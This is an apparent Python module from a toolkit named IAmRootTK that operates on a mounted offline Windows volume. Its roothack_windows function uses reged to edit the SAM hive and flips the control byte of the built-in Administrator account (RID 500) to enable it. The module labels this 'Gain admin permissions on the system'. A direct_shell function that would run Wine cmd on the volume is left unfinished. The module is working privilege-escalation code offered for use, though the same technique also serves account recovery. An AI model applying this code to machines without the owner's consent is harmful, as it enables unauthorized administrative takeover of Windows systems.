import os
import shutil
import subprocess
import time
# Root-directory entries that must ALL be present on an NTFS volume before
# is_windows() reports it as a Windows installation.
WINDOWS_ROOT = {"Windows", "Users"}

# Key of the built-in Administrator account inside the SAM hive
# (0x1F4 == RID 500), relative to the hive root.
ELEVATED_ADMIN = r"\SAM\Domains\Account\Users\000001F4"

# Renames direct_shell() applies on the mounted volume so Wine finds the
# directories under the lower-case names it expects. The second entry relies
# on the first having been applied; they are undone in reverse order.
WINE_CASE_FIX = [
    ("Windows", "windows"),
    ("windows/System32", "windows/system32"),
]

# Files (relative to drive_c) that direct_shell() copies from the user's own
# Wine prefix onto the volume when the Windows installation lacks them, and
# removes again when the shell exits.
WINE_RUNTIME_IMPORT = [
    "windows/system32/start.exe",
    "windows/system32/aclui.dll",
]
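def write_temp_reg(hive, reg_file="temp.reg"):
    """Import ``reg_file`` into ``hive`` with ``reged -C -I`` and delete the file.

    The import file is removed whether or not ``reged`` succeeds: it carries a
    copy of SAM data and must not linger in the working directory (the
    previous version only removed it on success).

    Args:
        hive: Path of the registry hive file to modify in place.
        reg_file: The ``.reg`` file to import. Defaults to ``temp.reg`` in the
            current working directory, which is where the callers write it.

    Raises:
        subprocess.CalledProcessError: ``reged`` exited with a status other than
            0 or 2. Status 2 is accepted as in the original; presumably reged's
            status for a hive that was changed and written -- confirm against
            reged's source before relying on it.
        FileNotFoundError: ``reged`` (chntpw) is not installed.
    """
    print("Writing...")
    cmd = ["reged", "-C", "-I", hive, r"HKEY_LOCAL_MACHINE", reg_file]
    try:
        result = subprocess.run(cmd)
        if result.returncode not in (0, 2):
            raise subprocess.CalledProcessError(result.returncode, cmd)
    finally:
        print("Cleaning up...")
        try:
            os.remove(reg_file)
        except FileNotFoundError:
            pass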
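def _normalize_mountpoint(path):
    """Strip trailing slashes for comparison, keeping the root mount as ``/``."""
    stripped = path.rstrip("/")
    return stripped if stripped else "/"


def _unescape_mount_field(field):
    """Undo the octal escapes /proc/mounts uses for space, tab, newline, backslash."""
    # Backslash (\134) goes last so a decoded backslash cannot form a new escape.
    for code, char in (("\\040", " "), ("\\011", "\t"), ("\\012", "\n"), ("\\134", "\\")):
        field = field.replace(code, char)
    return field


def is_readonly(mountpoint, mounts_file="/proc/mounts"):
    """Return True when ``mountpoint`` is mounted read-only.

    Scans ``mounts_file`` (``/proc/mounts`` by default) for entries whose mount
    point equals ``mountpoint``. When the same path appears several times the
    last entry wins, because a later mount over the same point shadows the
    earlier one (the previous version returned the first match). Matching
    ignores trailing slashes, works for ``/`` itself, and decodes the
    ``\\040``-style escapes the kernel writes for special characters.

    Args:
        mountpoint: Path to test, e.g. ``/mnt/windows`` or ``/mnt/windows/``.
        mounts_file: Mount table to read; parameterised so it can be tested.

    Returns:
        True when the mount options contain ``ro``, False otherwise.

    Raises:
        ValueError: ``mountpoint`` does not appear in the mount table.
    """
    wanted = _normalize_mountpoint(mountpoint)
    options = None
    with open(mounts_file) as f:
        for line in f:
            fields = line.split()
            if len(fields) < 4:
                continue
            if _normalize_mountpoint(_unescape_mount_field(fields[1])) == wanted:
                options = fields[3]
    if options is None:
        raise ValueError(f"Mountpoint not found in {mounts_file}")
    return "ro" in options.split(",")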
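def is_windows(device):
    """Return True when the NTFS volume on ``device`` looks like a Windows install.

    Lists the volume root with ``sudo ntfsls -f DEVICE`` (ntfs-3g; may prompt
    for the sudo password) and checks that every entry in ``WINDOWS_ROOT`` is
    present. Any failure to obtain the listing -- non-NTFS device, sudo
    refusal, or ``ntfsls``/``sudo`` not installed -- is printed and reported
    as "not Windows" instead of crashing.

    Args:
        device: Block device path, e.g. ``/dev/sda3``.
    """
    try:
        listing = subprocess.check_output(["sudo", "ntfsls", "-f", device]).decode("utf-8")
    except subprocess.CalledProcessError as e:
        print(e)
        return False
    except FileNotFoundError as e:
        # sudo or ntfsls (package ntfs-3g) is missing; previously an uncaught traceback
        print(e)
        return False
    return WINDOWS_ROOT.issubset(listing.split("\n"))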
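def assert_readwrite(mountpoint):
    """Exit with status 1 unless ``mountpoint`` is mounted read-write.

    The hint printed reflects the author's diagnosis for a read-only mount:
    Windows was hibernated rather than shut down (Fast Startup), so the driver
    mounted the volume read-only.

    Args:
        mountpoint: Mount point of the Windows volume, as passed to is_readonly().

    Raises:
        SystemExit: with status 1 when the mount is read-only.
        ValueError: propagated from is_readonly() when the mount is not listed.
    """
    if is_readonly(mountpoint):
        print("The filesystem was mounted as readonly")
        print("This could mean that windows was not shut down properly")
        print("To fully shutdown Windows press Shift+PowerOff in the start menu")
        raise SystemExit(1)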
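def _parse_f_value(reg_file):
    """Return the bytes of the ``"F"=hex:`` value in a reged ``.reg`` export.

    Returns None when the file holds no ``"F"`` value. The slice offsets are
    kept exactly as the original author wrote them: ``[-3]`` drops the
    trailing ``,\\`` plus newline of a continued line. NOTE(review): ``[9:]``
    and ``[3:]`` skip one character more than the regedit layout would
    suggest (``"F"=hex:`` is 8 characters, continuation lines are indented by
    two spaces); if reged writes that layout this silently drops the first hex
    digit of every line. Verify against a real reged export before relying on
    it, and do not "fix" it without one.
    """
    bts = bytearray()
    in_value = False  # inside a value continued over several lines
    found = False
    with open(reg_file, "r") as f:
        for line in f.readlines():
            part = None
            if line.startswith("\"F\"=hex:"):
                in_value = True
                found = True
                part = line[9:-3]
            elif in_value:
                if line.endswith("\\\n"):
                    part = line[3:-3]
                else:
                    part = line[3:]
                    in_value = False  # last line of the value
            if part:
                print(repr(part))
                for byte in part.split(","):
                    bts.append(int(byte, 16))
    return bts if found else None


def _export_admin_f_value(hive):
    """Export the RID 500 account's ``F`` value from ``hive``; None if absent.

    ``reged -x`` writes the key to ``temp.reg`` in the working directory; the
    file is parsed and deleted straight away so no copy of SAM data is left
    behind when the caller bails out (the previous version left it there).
    """
    print("Exporting elevated admin...")
    subprocess.check_call(["reged", "-x", hive, r"HKEY_LOCAL_MACHINE\SAM", ELEVATED_ADMIN, "temp.reg"])
    try:
        return _parse_f_value("temp.reg")
    finally:
        try:
            os.remove("temp.reg")
        except FileNotFoundError:
            pass


def _import_admin_f_value(hive, bts):
    """Write ``bts`` back as the RID 500 account's ``F`` value in ``hive``.

    Builds a regedit-5 file holding the whole value and hands it to
    write_temp_reg(), which imports it with ``reged`` and removes the file.
    """
    print("Creating temp.reg...")
    hexdump = ",".join(f"{b:02x}" for b in bts)
    contents = (
        "Windows Registry Editor Version 5.00\n"
        f"[HKEY_LOCAL_MACHINE{ELEVATED_ADMIN}]\n"
        f"\"F\"=hex:{hexdump}\n"
    )
    with open("temp.reg", "w") as f:
        f.write(contents)
    write_temp_reg(hive)


def roothack_windows(mountpoint, action=None):
    """Enable (or disable) the built-in Administrator account in an offline SAM hive.

    Operates on ``Windows/System32/config/SAM`` under ``mountpoint``: the ``F``
    value of the RID 500 account is exported with ``reged``, byte 56 of it is
    flipped between 0x11 and 0x10, and the value is imported back. Nothing else
    about the account is touched -- in particular its password is left as is,
    so a password-protected Administrator stays password-protected. Byte 56
    (offset 0x38) is where the code expects the account-control flags; the
    0x01 bit is treated as "account disabled" (consistent with chntpw's
    ACB_DISABLED -- verify there before changing the offsets).

    Args:
        mountpoint: Mount point of the Windows volume; must be read-write.
        action: ``"enable"``, ``"disable"``, ``"toggle"`` or ``None``. With
            ``None`` a disabled account is enabled and, for an already enabled
            one, the user is asked whether to disable it again. A byte 56 that
            is neither 0x10 nor 0x11 is treated as corruption; the user may
            choose to overwrite it with the enabled/disabled flag anyway.

    Raises:
        SystemExit: read-only mount, missing ``F`` value, or corruption the user
            declined to overwrite.
        subprocess.CalledProcessError: ``reged`` failed.
    """
    print("Windows roothack")
    assert_readwrite(mountpoint)
    HKLM_Sam_Hive = os.path.join(mountpoint, "Windows/System32/config/SAM")
    print("Hive:", HKLM_Sam_Hive)
    bts = _export_admin_f_value(HKLM_Sam_Hive)
    if bts is None:
        print(r"Unable to get SAM\Domains\Account\Users\000001F4\F")
        print("ElevatedAdmin is corrupted")
        raise SystemExit(1)
    print("Value:", bts)
    enabled = bts[56]
    if enabled == 0x10:
        print("System is already roothacked")
        if action in ("disable", "toggle") or (
            action is None and input("Do you want to remove it (N/y)? ").lower() == "y"
        ):
            bts[56] = 0x11
            _import_admin_f_value(HKLM_Sam_Hive, bts)
            print("Disabled ElevatedAdmin")
        return
    if enabled != 0x11:
        print("Elevated Admin user is corrupted. (key:", hex(enabled), ")")
        if input("Try to recover (The system may be damaged!) (N/y)? ").lower() != "y":
            raise SystemExit(1)
        enabled = 0x11  # proceed as if the account were merely disabled
    if action in ("enable", "toggle", None):
        bts[56] = 0x10
        _import_admin_f_value(HKLM_Sam_Hive, bts)
        print("Enabled ElevatedAdmin")
        print("You can now boot back into the os log in as Administrator")
        print("This account can have different names depending on the system language")
    else:
        # action == "disable" on an account that is not enabled: nothing to write
        print("ElevatedAdmin is not enabled, nothing to do")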
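def direct_shell(mountpoint):
    """Run a Wine ``cmd`` on top of the mounted Windows volume (unfinished).

    The function prints its banner and raises ``NotImplementedError`` before
    doing anything else; everything after the ``raise`` is work in progress and
    never executes. It is kept so the intended approach survives: rename the
    login user's ``~/.wine/drive_c`` aside, symlink the mounted volume in its
    place, lower-case ``Windows``/``System32`` on the volume as Wine expects,
    copy in the few runtime files Wine needs, run ``wine cmd`` as that user,
    then undo all of it.

    Hazards in the work-in-progress code, for whoever finishes it:
      * the ``WINE_CASE_FIX`` renames and ``WINE_RUNTIME_IMPORT`` copies go
        through the symlink and therefore modify the real Windows volume; a
        crash before the cleanup leaves Wine's files in the target's
        ``System32`` and its directories renamed;
      * ``wine cmd`` runs as the login user with the target volume as ``C:``,
        so anything launched from it runs on the live system.

    Args:
        mountpoint: Path where the Windows volume is mounted read-write.

    Raises:
        NotImplementedError: always.
    """
    print("Windows direct shell")
    raise NotImplementedError
    # ---- unreachable work in progress below this line ----
    assert_readwrite(mountpoint)
    try:
        ver = subprocess.run(["wine", "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    except FileNotFoundError:
        ver = None
    if ver is None or ver.returncode:
        print("Direct shell requires WINE to be installed")
        print("Install wine using your package manager")
        raise SystemExit(1)
    version = ver.stdout.decode("utf-8").strip("\n")
    print("Wine version:", version)
    # The tool normally runs under sudo, but the Wine prefix belongs to the
    # login user. `getent passwd NAME` returns exactly that entry; the earlier
    # shell pipeline `getent passwd | grep -E "^NAME"` also matched any user
    # whose name merely starts with NAME and then failed to unpack.
    login = subprocess.check_output(["logname"]).decode("utf-8").strip()
    passwd_line = subprocess.check_output(["getent", "passwd", login]).decode("utf-8").strip()
    username, _, _, _, _, homedir, _ = passwd_line.split(":")
    wine_c = os.path.join(homedir, ".wine/drive_c")
    wine_c_bak = os.path.join(homedir, ".wine/drive_c.IAMROOT.BAK")
    print("C:", wine_c)
    # Each forward step records what it did so the cleanup undoes only that.
    # The previous version reversed the renames unconditionally and, when the
    # symlink step had failed, would rename directories inside the user's real
    # drive_c instead.
    symlinked = False
    cased = []
    runtime_copied = []
    if os.path.exists(wine_c) and not os.path.exists(wine_c_bak):
        print("Making drive_c backup...")
        os.rename(wine_c, wine_c_bak)
    try:
        print("Symlinking the filesystem...")
        os.symlink(mountpoint, wine_c)
        symlinked = True
        print("Fixing casing...")
        for src, dst in WINE_CASE_FIX:
            print(src, "->", dst)
            os.rename(os.path.join(wine_c, src), os.path.join(wine_c, dst))
            cased.append((src, dst))
        print("Copying wine runtime files...")
        for file in WINE_RUNTIME_IMPORT:
            print(file)
            target = os.path.join(wine_c, file)
            source = os.path.join(wine_c_bak, file)
            if os.path.exists(target):
                continue
            if not os.path.exists(source):
                print("WARNING: Runtime file", file, "was not found in drive_c backup")
                continue
            print("Copying", file)
            shutil.copy(source, target)
            runtime_copied.append(file)
        print("Running wine cmd...")
        subprocess.run(["sudo", "su", username, "-c", "wine cmd"])
    except Exception as e:
        # Best effort: report and fall through to the cleanup below.
        print("An error occured!")
        print(type(e).__name__ + ":", str(e))
    finally:
        print("Exited.")
        print("Removing wine runtime files...")
        for file in runtime_copied:
            target = os.path.join(wine_c, file)
            if not os.path.exists(target):
                print("WARNING: Runtime file", file, "was marked as copied, but it's not found")
                continue
            os.remove(target)
        print("Restoring casing...")
        for src, dst in reversed(cased):
            print(dst, "->", src)
            os.rename(os.path.join(wine_c, dst), os.path.join(wine_c, src))
        if symlinked and os.path.islink(wine_c):
            print("Removing symlink...")
            os.remove(wine_c)
        # Also restores a backup left over from an earlier crashed run, but
        # never on top of an existing drive_c.
        if os.path.exists(wine_c_bak) and not os.path.lexists(wine_c):
            print("Restoring backup...")
            os.rename(wine_c_bak, wine_c)
            print("Restored.")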
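# Per-OS entry points looked up by the rest of the toolkit.
roothack = roothack_windows


def shell(*a):
    """Stand-in for the per-OS "shell" entry point: not available on Windows.

    Prints where a contribution would go and exits with status 1. Arguments
    are accepted and ignored so the call shape matches the other OS modules
    (assumed from the original ``*a`` lambda; their signatures are not visible
    here).
    """
    print("Shell is unavailable for windows")
    print("If you can figure out how to do it, make a pull request to")
    print("https://github.com/highghlow/IAmRootTK")
    raise SystemExit(1)


TOOLS = {
    "Gain admin permissions on the system": roothack_windows,
}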